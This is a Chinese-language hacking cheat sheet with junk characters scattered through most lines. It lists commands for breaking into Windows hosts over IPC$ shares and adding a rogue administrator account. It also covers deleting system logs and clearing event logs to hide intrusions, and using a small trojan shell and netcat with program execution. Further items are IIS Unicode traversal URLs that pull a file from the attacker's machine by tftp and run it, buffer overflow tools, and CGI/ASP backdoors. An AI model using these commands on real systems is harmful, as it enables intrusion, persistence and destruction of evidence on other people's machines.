网管和黑客都必须知道的命令
'}rRzD: 常用的几条NET命令:
PC qZNBN (D
9Su^:1 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
@rHK(25+d #_B-4sm (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
[y0O{,lI Dk='+\ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
sO5?aB& J-ePE7i (查看远程主机时间) net time \\IP地址
@G:V q|%(3,)ig (定时启动某个程序) at \\IP地址 02:18 readme.exe
'oN\hy($,h 5P .qXA"D (查看共享) net view \\IP地址
>j{z> qiZO _=0 (查看netbios工作组列表) nbtstat -A IP地址
NWd<+-pC6 4Td{;Y="yF (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
:aG#~-Q 5'Q|EIL (这两条把自己增加到管理员组): net user 用户名 密码 /add
af|5n><~A ]7Fs$y. net localgroup Administrators 用户名 /add
NO]
3* Nk[2nyeO> (断开连接) net use \\IP地址\ipc$ /delete
St<mDTi cv(PP-'\ 扫尾:
Q.Aw2 k/03ZxC- del C:\winnt\system32\logfiles\*.*
jt@SZI` #eN{!Niy&U del C:\winnt\ssytem32\config\*.evt
)9S>ZZF @
a4/ELx del C:\winnt\system32\dtclog\*.*
z`6fotL 2..,Sk del C:\winnt\system32\*.log
I2a6w<b ?go:e# del C:\winnt\system32\*.txt
l_j4DQBRV O}[PJfvBHo del C:\winnt\*.txt
Jjl%R[mI DOz\n|8S del C:\winnt\*.log
`+#G+Vu5 xBFJ} v 一、netsvc.exe
}P3tn 'u4ezwF; 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
zd]D(qeX vfB2XVc netsvc /list \\IP地址
KvQ,;A +x]9+D& netsvc schedule \\IP地址 /query
azP+GM=i7 >23- netsvc \\IP地址 schedule /start
/j"sS2$U ^>?CMcN4* 二、OpenTelnet.exe
n}mR~YqD JjXobNQf 远程启动主机的Telnet服务,并绑定端口到7878,例如:
hCYQGx0 E(Rh#+]Y5 OpenTelnet \\IP地址 用户名 密码 1 7878
HP.E3yYK +Ug/rtK4 然后就可以telnet到主机的7878端口,进入DOS方式下:
gq"k<C0 iU+nqY' telnet IP地址 7878
aS}1Q?cU 1ZJQs6 三、winshell.exe
N4K8
u'f^ XCsiEKZ_i 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
IkzTJ%> q4UA]+-* p Path (查看winshell主程序的路径信息)
=N);v\ Q$! 0lM{l? b reBoot (重新启动机器)
jxgj,h"}9` 8wH.et25k d shutDown (关闭机器)
NDO\B,7 ?8,%LIQ? s Shell (执行后你就会看到可爱的“C:\>”)
rC_*sx
r^ g`k?AM\ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
a4gi,pz$] pbHsR^ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
rs=q!
P"u[ QHBtWQgS 四、3389登陆器,GUI方式登录远程主机的
GO! uwo: fWGOP~0 五、elsave.exe
W
YW|P2* o$.e^XL
事件日志清除工具
r,(et nsb4S{ elsave -s \\IP地址 -l "application" -C
~e@>zoM'^ @OV-KT[> elsave -s \\IP地址 -l "system" -C
k;dXOn jy2IZ o elsave -s \\IP地址 -l "security" -C
.7ayQp Fk=}iB#( 执行后成功清除应用程序日志,系统日志,安全日志
Hqz?E@bc@ ?RFg$Z'^ 六、hbulot.exe
6qo^2 >cL{Ya}Rz 开启win2kserver和winxp的3389服务
uk`8X`' qIwV q!= hbulot [/r]
fR-C0"c p3^jGj@ 使用/r表示安装完成后自动重起目标使设置生效。
>i,iOx|E- }i!pL(8; 七、nc.exe(netcat.exe)
S06Hs~>Y P5QQpY{<I 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
']ood! /"qcl7F 想要连接到某处: nc [-options] hostname port[s] [ports] ...
t>UkE9=3\ tGcya0RL 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
%qsvtc` Zs zs1{t 参数:
(y4#.vZh: o=fgin/E\ -e prog 程序重定向,一旦连接,就执行 [危险!!]
;%q39U} ^a9 oKI9n -g gateway source-routing hop point[s], up to 8
^ons:$0h R@T6U:1 -G num source-routing pointer: 4, 8, 12, ...
+:jT=V"X [IM%b~j(^ -h 帮助信息
O,V9R
rG g+zJ? -i secs 延时的间隔
MN=
sIP,zk (9fdljl],: -l 监听模式,用于入站连接
a?cn9i)# $<?X7n^ -n 指定数字的IP地址,不能用hostname
@=]8^?$t
0 KT*:F(4` -o file 记录16进制的传输
VU!w!GN]Y -[#n+`M -p port 本地端口号
M"^K0 . yfjXqn[Z4 -r 任意指定本地及远程端口
iy5R5L2 WNa0, -s addr 本地源地址
ek-!b!iI U!q[e`B -u UDP模式
NSLVD[yT iT)WR90 -v 详细输出——用两个-v可得到更详细的内容
q(z7~:+qNr `QP
~ -w secs timeout的时间
{M~lbU V`a+Hi<P\ -z 将输入输出关掉——用于扫描时
2C+(":=} 八、TFTPD32.EXE
U_z2J(e~ T>]sQPg 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
0^ !Gib hY\{| http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
nZvU'k: J0<p4%Cf 然后可以直接令文件运行:
f5dR 5G E%k7wM { http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
U
:9=3A2$x ?p8Qx\%* 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
)GB`*M[ 1IA5.@G: 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
\MYU<6{u KHj6Tg;) 一、一 Xscan命令行运行参数说明:
]YD(`42 x Y\t_&